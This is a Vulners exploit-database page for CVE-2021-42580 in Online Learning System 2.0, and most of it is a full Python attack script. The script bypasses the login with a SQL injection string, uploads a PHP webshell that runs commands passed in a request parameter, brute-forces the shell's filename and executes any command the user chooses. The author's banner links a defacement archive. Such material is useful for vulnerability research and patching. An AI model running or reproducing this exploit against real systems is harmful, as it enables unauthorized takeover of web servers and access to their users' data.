Vulners
Lucene search
Online Learning System 2.0 - Remote Code Execution (RCE)
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Online Learning System 2.0 - Remote Code Execution Exploit | 16 Nov 202100:00 | – | zdt |
 | CVE-2021-42580 | 17 Nov 202116:20 | – | circl |
 | Sourcecodester Pisay Online E-Learning System SQL注入漏洞 | 15 Nov 202100:00 | – | cnnvd |
 | Sourcecodester Online Learning System SQL Injection Vulnerability | 21 Nov 202100:00 | – | cnvd |
 | CVE-2021-42580 | 15 Nov 202115:57 | – | cve |
 | CVE-2021-42580 | 15 Nov 202115:57 | – | cvelist |
 | EUVD-2021-29545 | 3 Oct 202520:07 | – | euvd |
 | CVE-2021-42580 | 15 Nov 202116:15 | – | nvd |
 | CVE-2021-42580 | 15 Nov 202116:15 | – | osv |
 | Online Learning System 2.0 Remote Code Execution | 16 Nov 202100:00 | – | packetstorm |
10
# Exploit Title: Online Learning System 2.0 - Remote Code Execution (RCE)
# Date: 15/11/2021
# Exploit Author: djebbaranon
# Vendor Homepage: https://github.com/oretnom23
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip
# Version: 2.0
# Tested on: Kali linux / Windows 10
# CVE : CVE-2021-42580
#!/usr/bin/python3
import os
import time
import argparse
import requests
import sys
from colorama import init
from colorama import Fore
from colorama import Back
from colorama import Style
init(autoreset=True)
def banner():
print('''
_____ _ _ _ _ _____ ______ _____ _____
| _ | | (_) | | (_) / __ \ | ___ / __ | ___|
| | | |_ __ | |_ _ __ ___ | | ___ __ _ _ __ _ __ _ _ __ __ _ __ _`' / /' | |_/ | / \| |__
| | | | '_ \| | | '_ \ / _ \ | |/ _ \/ _` | '__| '_ \| | '_ \ / _` | \ \ / / / / | /| | | __|
\ \_/ | | | | | | | | | __/ | | __| (_| | | | | | | | | | | (_| | \ V /./ /___ | |\ \| \__/| |___
\___/|_| |_|_|_|_| |_|\___| |_|\___|\__,_|_| |_| |_|_|_| |_|\__, | \_/ \_____/ \_| \_|\____\____/
__/ |
|___/
Written by djebbaranon
twitter : @dj3bb4ran0n1
zone-h : http://zone-h.org/archive/notifier=djebbaranon
''')
banner()
def my_args():
parser = argparse.ArgumentParser(epilog="Example : python3 -u http://localhost/elearning -r 1000 -c whoami")
parser.add_argument("-u","--url",type=str,required=True,help="url of target")
parser.add_argument("-r","--range",type=int,required=True,help="range for bruteforce the webshell name")
parser.add_argument("-c","--command",type=str,required=True,help="command to execute")
my_arguments = parser.parse_args()
return my_arguments
def login_with_sqli_login_bypass(user,passw):
global session
global url
global cookies
url = my_args().url
session = requests.Session()
data = {
"username" : user,
"password" : passw,
}
try:
response = session.post(url + "/classes/Login.php?f=login",data=data,verify=False)
print( Fore.GREEN + "[+] Logged in succsusfully")
cookies = response.cookies.get_dict()
print("[+] your cookie : ")
except requests.HTTPError as exception:
print(Fore.RED + "[-] HTTP Error : {}".format(exception))
sys.exit(1)
login_with_sqli_login_bypass("' or 1=1 -- -","' or 1=1 -- -")
def main(shell_name,renamed_shell):
try:
payload ={
"id" : "",
"faculty_id" : "test",
"firstname" : "test",
"lastname" : "test",
"middlename" : "fsdfsd",
"dob" : "2021-10-29",
"gender": "Male",
"department_id" : "1",
"email" : "[email protected]",
"contact" : "zebii",
"address" : "zebii",
}
files = {
"img" :
(
shell_name,
"<?php echo \"<pre><h1>nikmok</h1>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"?>",
"application/octet-stream",
)
}
vunlerable_file = "/classes/Master.php?f=save_faculty"
print("[*] Trying to upload webshell ....")
response_2 = session.post(url + vunlerable_file,data=payload,cookies=cookies,files=files)
print("[+] trying to bruteforce the webshell ....")
rangee = my_args().range
for i in range(0,rangee):
try:
with requests.get(url + "/uploads/Favatar_" + str(i) + ".php?cmd=whoami",allow_redirects=False) as response3:
if "nikmok" in response3.text and response3.status_code == 200:
print("\n" + Fore.GREEN + "[+] shell found : " + response3.url +"\n")
break
with open("shell.txt",mode="w+") as writer:
writer.write(response3.url)
else:
print( Fore.RED + "[-] shell not found : " + response3.url)
except requests.HTTPError as exception2:
print("[-] HTTP Error : {0} ".format(exception2))
except requests.HTTPError as error:
print("[-] HTTP Error : ".format(error))
command = my_args().command
with requests.get(response3.url.replace("whoami",command)) as response4:
print("[*] Executing {} ....".format(command))
time.sleep(3)
print("\n" + Style.BRIGHT + Fore.GREEN + response4.text)
main("hackerman.php","")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Nov 2021 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 27.5
CVSS 3.19.8
EPSS0.03818